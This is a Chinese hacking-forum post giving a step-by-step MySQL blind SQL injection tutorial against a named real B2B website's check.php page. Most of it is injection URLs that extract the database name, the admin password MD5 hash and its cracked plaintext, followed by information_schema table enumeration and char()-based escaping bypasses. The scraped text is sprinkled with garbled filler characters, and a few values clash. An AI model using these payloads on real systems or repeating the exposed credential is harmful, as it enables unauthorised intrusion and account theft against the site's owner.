找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MySQL盲注最全 实例讲解 详解
返回列表 发新帖
查看: 3297|回复: 0
打印 上一主题 下一主题

MySQL盲注最全 实例讲解 详解

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-9-25 13:52:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文实例来自习科论坛交流三群。这个注入点可以使用错误回显注入来爆数据,本文出于讲解的目的,使用更麻烦的盲注。
1 W% x" V2 G7 l" D1 H5 r. X7 M阅读本文,需要有一点点SQL基础。盲注理解起来其实非常简单,就是做起来非常费劲
+ K. ?4 b' `3 F: E% M( e作者:YoCo Smart# ]9 z: P5 T' V5 a; ^
来自:习科信息技术 - http://BlackBap.Org7 C5 G: t  h0 k, }0 f) R2 T
我们先来看注入点,是一个B2B网站建站公司:
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin
  • 用户名已被注册
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'
  • select userid from demo_b2b_member where user = 'admin''You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1; V, p8 k5 i  _
; Z! N/ |. A) G
复制代码8 H" T) L4 B3 z8 J; F
错误提示已经很明了了。我们看一下注入页面的代码(有删改):
  • $js_user = trim($_GET["js_user"]);
  • if($js_user){
  • $num = $db->num_rows("select userid from demo_b2b_member where user = '$js_user'");
  • if(!$num)
  • echo "<div class=tips3></div>";
  • else
  • echo "<div class=tips2>用户名已被注册</div>";
  • }5 o' X9 Z7 @( r' ~# J- r" d& H0 X8 |9 l

: q/ G5 }8 U  o8 u8 R复制代码7 K- K4 K3 X0 f' t# t, J: L7 a
以GET方式取值的变量js_user虽然没有过滤被直接带入了数据库执行,并且MySQL也执行了,但是并没有显示数据库的任何信息,而是判断是否符合
! `7 p% i/ S" w4 {  A% w; O那么我们先从union的盲注来看吧。! y3 p! Q# c( m5 e2 y% S3 k
先看版本:
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(version(),1)=5%231 V) u8 o9 }6 B7 p

# k# Y: i( w. F# }" H复制代码+ U: d; C  p) ?
这个时候我们来看看原来的代码中的SQL语句是怎么执行的:
  • select userid from demo_b2b_member where user = 'admin'and left(version(),1)=5#', E6 v1 x: ?5 t7 F0 \

- X7 Y4 z1 A& Z# f- D' D" R9 A复制代码# l2 Q7 B3 }9 W3 U
因为执行成功,所以不符合if(!$num)这个条件,回显“用户名已被注册”,那么版本为5成立) K2 h8 Q) T( k2 ]+ a/ |3 `
再来看database()的数据:
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length(database())=6%23
  • database()长度6
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),1)='l'%23
  • l
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),2)='li'%23
  • li
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),3)='lic'%23
  • lic
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),4)='licl'%23
  • licl
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),5)='licln'%23
  • licln
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),6)='liclny'%23
  • licclny7 L9 K* l7 O& u- `7 q" g+ U2 k

4 |& B! C- J* a7 l" S; e$ n复制代码
' x$ A+ T3 M" ]length()函数是计算括号中数据的长度,回显为纯数字,可以用大于小于和等于号来判断是否正确。
- M9 c- H% A" x& ?5 @% }这里要注意看一下left()函数中的数字变化,关于left()函数,可以自行参考MySQL手册。- J9 Z, h# W! `9 @4 {
再来看一点简单的判断句:
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length(pass)=32%23
  • select userid from demo_b2b_member where user = 'admin'and length(pass)=32#'
    + }" G$ m' f7 f5 @0 u

% T9 z- h. I7 p4 x6 M6 }, j复制代码
- w0 C8 C3 w! Q这个时候length()函数中的pass是猜测的,当然是建立在猜测正确的基础上。$ }$ J5 I) J4 e! ]5 X, O
这里要说的是,pass和前面select后的userid同属一个表段demo_b2b_admin,所以不需要再带select语句- z; M/ k1 r( j/ G# ^$ [
那么这里就能得到:
  • 这里最后没有'#这个终止符,大家带进去看一下,你们懂得。前开后闭。
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,1)='0
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,2)='04
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,3)='048
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,4)='0484
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,5)='04843
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,6)='04843e
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,7)='04843e9
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,8)='04843e9f
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,9)='04843e9f9
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,10)='04843e9f91
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,11)='04843e9f91a
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,12)='04843e9f91ad
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,13)='04843e9f91adf
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,14)='04843e9f91adf2
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,15)='04843e9f91adf22
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,16)='04843e9f91adf228
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,17)='04843e9f91adf2287
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,18)='04843e9f91adf2287c
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,19)='04843e9f91adf2287c0
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,20)='04843e9f91adf2287c0a
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,21)='04843e9f91adf2287c0af
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,22)='04843e9f91adf2287c0af5
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,23)='04843e9f91adf2287c0af5f
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,24)='04843e9f91adf2287c0af5fe
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,25)='04843e9f91adf2287c0af5fe1
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,26)='04843e9f91adf2287c0af5fe16
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,27)='04843e9f91adf2287c0af5fe167
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,28)='04843e9f91adf2287c0af5fe1675
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,29)='04843e9f91adf2287c0af5fe16750
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,30)='04843e9f91adf2287c0af5fe16750a
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,31)='04843e9f91adf2287c0af5fe16750a3
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,32)='04843e9f91adf2287c0af5fe16750a35
  • 长度是32,是md5加密,解密得到lcl2wly
    9 L5 s4 n8 {8 K/ ^) V  u( w& z

3 X4 p& Z- ^5 @复制代码
$ l( W/ F- u6 r! w" s2 I3 E这样,猜数据的方法你肯定是懂了  Y2 o, q* T) a' P5 _
5 s( d$ g$ `. v5 }( s

3 c6 r# C' W/ R最后,我们来看demo_b2b_admin以外的数据,现在再来猜表段:
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length((select+table_name+from+information_schema.tables+limit+0,1))<100%23
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length((select+table_name+from+information_schema.tables+limit+0,1))=14%23
    2 n9 s# z8 j  F& p# [/ [9 E
/ P3 e2 e" x, G0 L& V8 a
复制代码  p3 p" f6 V' c# `" ]
实际运行的SQL语句就是:
  • select userid from demo_b2b_member where user = 'admin'and length((select table_name from information_schema.tables limit 0,1))=14#'
    5 R1 a; ?9 p9 g% Q4 ?4 Q6 ~: m; q
1 D; P: ]! b% X* C* x" A
复制代码
% W& G2 q& ~4 L5 m0 Z# [1 H上面这个语句,对于information_schema不明白的,可以参考其他MySQL注入文章来看一下这个库的意义。1 \! n! x$ H* Z' v. [4 t
关于limit x,y 的用法,可以参考MySQL手册
5 j7 r3 c& j! F) T0 G
5 [, `6 T* Q3 d/ G( y最后剩下的要说的就是ascii函数和hex函数了
% ?  p8 T0 d, F! _& {' Z这两个函数的意义是避开php的GPC转义,例如:
  • http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+substr(left(pass,1),1,1)=char(48)%23
  • select userid from demo_b2b_member where user = 'admin'and substr(pass,1,1)=char(48)#
    ! N* Q8 ^3 d3 P% v7 c7 [6 x

/ q* Y& L: }# p, [* E; i" A复制代码* E4 U. w' I% R1 }; o: P
substr()的用法可以参考MySQL手册,如果不懂,就这样套好了。Char()里面的数字替换为ascii码数字
网站建站, 信息技术, version, 用户名, manual

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表